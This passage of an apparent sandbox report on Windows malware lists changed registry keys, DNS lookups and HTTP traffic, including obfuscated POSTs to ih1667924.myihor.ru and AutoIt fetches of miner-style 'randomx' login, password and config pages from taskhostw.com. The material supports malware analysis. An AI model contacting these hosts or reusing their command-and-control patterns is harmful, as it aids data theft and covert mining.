- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\BeepEnabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\DefaultSpoolDirectory",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\Ne00:",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\Ne01:",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
- "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
- "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\AppID\\PolicyConverter\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\0A1870FD-5D56-4033-B69F-E1BD5FF7D09A\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\0A1870FD-5D56-4033-B69F-E1BD5FF7D09A\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\18E94867-91BA-4791-A6F2-C9F987B18808\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\18E94867-91BA-4791-A6F2-C9F987B18808\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Site-Name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Distinguished-Name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\SlowLink",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\WQLFilterPass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\AccessDenied",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\GPO-Disabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Options",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\GPOID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\SOM",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\WQL-Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\Enabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\NoOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\DsPath",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\SOM",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Site-Name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Distinguished-Name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\SlowLink",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\Version",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\WQLFilterPass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\AccessDenied",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\GPO-Disabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\Options",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\GPOID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\SOM",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\WQL-Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Loopback-GPO-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\Enabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\NoOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\DsPath",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\SOM",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Loopback-GPLink-List",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeLo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeHi",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeLo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeHi",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\Status",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\LoggingStatus",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\PolicyOverdue",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeLo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeHi",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeLo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeHi",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\Status",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\LoggingStatus",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\PolicyOverdue"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Acrobat Update Task.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Acrobat Update Task.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Flash Player NPAPI Notifier.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Flash Player NPAPI Notifier.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineCore.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineCore.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineUA.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineUA.job.fp"
- * DNS Communications:
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- "type": "A",
- "request": "ih1667924.myihor.ru",
- "answers":
- "data": "193.124.178.83",
- "type": "A"
- "type": "A",
- "request": "iplogger.org",
- "answers":
- "data": "88.99.66.31",
- "type": "A"
- "type": "A",
- "request": "freemail.freehost.com.ua",
- "answers":
- "data": "194.0.200.251",
- "type": "A"
- "type": "A",
- "request": "rms-server.tektonit.ru",
- "answers":
- "data": "109.234.156.182",
- "type": "A"
- "type": "A",
- "request": "taskhostw.com",
- "answers":
- "data": "194.67.196.43",
- "type": "A"
- "type": "A",
- "request": "windrvs.com",
- "answers":
- "data": "185.127.24.188",
- "type": "A"
- * Domains:
- "ip": "109.234.156.182",
- "domain": "rms-server.tektonit.ru"
- "ip": "88.99.66.31",
- "domain": "iplogger.org"
- "ip": "185.127.24.188",
- "domain": "windrvs.com"
- "ip": "193.124.178.83",
- "domain": "ih1667924.myihor.ru"
- "ip": "194.67.196.43",
- "domain": "taskhostw.com"
- "ip": "194.0.200.251",
- "domain": "freemail.freehost.com.ua"
- "ip": "66.212.29.250",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://ip-api.com/json",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/json",
- "data": "GET /json HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: ip-api.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "uri": "http://ih1667924.myihor.ru/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "ih1667924.myihor.ru",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ih1667924.myihor.ru\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.usertrust.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.comodoca.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.comodoca.com",
- "version": "1.1",
- "path": "/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
- "data": "GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://ih1667924.myihor.ru/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "ih1667924.myihor.ru",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ih1667924.myihor.ru\r\nContent-Length: 9687\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/STATUS.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/STATUS.html",
- "data": "GET /randomx/STATUS.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/loaderTOP.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/loaderTOP.html",
- "data": "GET /randomx/loaderTOP.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/Login.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/Login.html",
- "data": "GET /randomx/Login.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/Password.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/Password.html",
- "data": "GET /randomx/Password.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/Server.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/Server.html",
- "data": "GET /randomx/Server.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://taskhostw.com/randomx/configCPUX.html",
- "user-agent": "AutoIt",
- "method": "GET",
- "host": "taskhostw.com",
- "version": "1.1",
- "path": "/randomx/configCPUX.html",
- "data": "GET /randomx/configCPUX.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment